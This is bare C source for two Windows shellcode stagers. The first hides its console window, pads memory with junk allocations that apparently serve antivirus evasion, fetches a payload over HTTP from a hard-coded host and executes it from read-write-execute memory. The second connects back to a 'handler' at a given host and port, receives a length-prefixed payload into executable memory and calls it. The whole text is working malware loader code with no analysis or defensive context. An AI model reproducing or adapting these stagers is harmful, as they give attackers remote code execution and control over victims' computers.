int main(int argc, char * argv[]) { HWND hwnd=GetForegroundWindow(); ShowWindow(hwnd,SW_HIDE); char * buffer; int i; char* char_array1[8776]; for (i = 0; i < 8776; ++i) char_array1[i] = (char*)malloc (9719); winsock_init(); char* char_array2[118]; SOCKET my_socket = wsconnect(); for (i = 0; i < 118; ++i) char_array2[i] = (char*)malloc (9721); char request_buf[200]; sprintf(request_buf, "GET /%s HTTP/1.1\r\nAccept-Encoding: identity\r\nHost: 192.168.159.131:8080\r\nConnection: close\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT\r\n\r\n", checksum()); send(my_socket,request_buf, strlen( request_buf ),0); Sleep(300); buffer = (char*)VirtualAlloc(0, 1000000, MEM_COMMIT, PAGE_EXECUTE_READWRITE); char* char_array3[8279]; for (i=0; i<8776; ++i) { strcpy(char_array1[i], Name1()); } char * buf_counter = buffer; int bytes_read; do { bytes_read = recv(my_socket, buf_counter, 1024, 0); buf_counter += bytes_read; } while ( bytes_read > 0 ); for (i = 0; i < 8279; ++i) char_array3[i] = (char*)malloc (9549); for (i=0; i<118; ++i) { strcpy(char_array2[i], Name2()); } closesocket(my_socket); WSACleanup(); ((void (*)())(strstr(buffer,"\r\n\r\n")+4))(); for (i=0; i<8279; ++i) { strcpy(char_array3[i], Name3()); } return 0; }
int main(int argc, char * argv[]) { ULONG32 size; char * buffer; void(*function)(); winsock_init(); if (argc != 3) { printf("%s [host] [port]\n", argv[0]); exit(1); } /* connect to the handler */ SOCKET my_socket = wsconnect(argv[1], atoi(argv[2])); /* read the 4-byte length */ int count = recv(my_socket, (char *)&size, 4, 0); if (count != 4 || size <= 0) punt(my_socket, "read a strange or incomplete length value\n"); /* allocate a RWX buffer */ buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if (buffer == NULL) punt(my_socket, "could not allocate buffer\n"); /* prepend a little assembly to move our SOCKET value to the EDI register thanks mihi for pointing this out BF 78 56 34 12 => mov edi, 0x12345678 */ buffer[0] = 0xBF; /* copy the value of our socket to the buffer */ memcpy(buffer + 1, &my_socket, 4); /* read bytes into the buffer */ count = recv_all(my_socket, buffer + 5, size); /* cast our buffer as a function and call it */ function = (void(*)())buffer; function(); return 0; }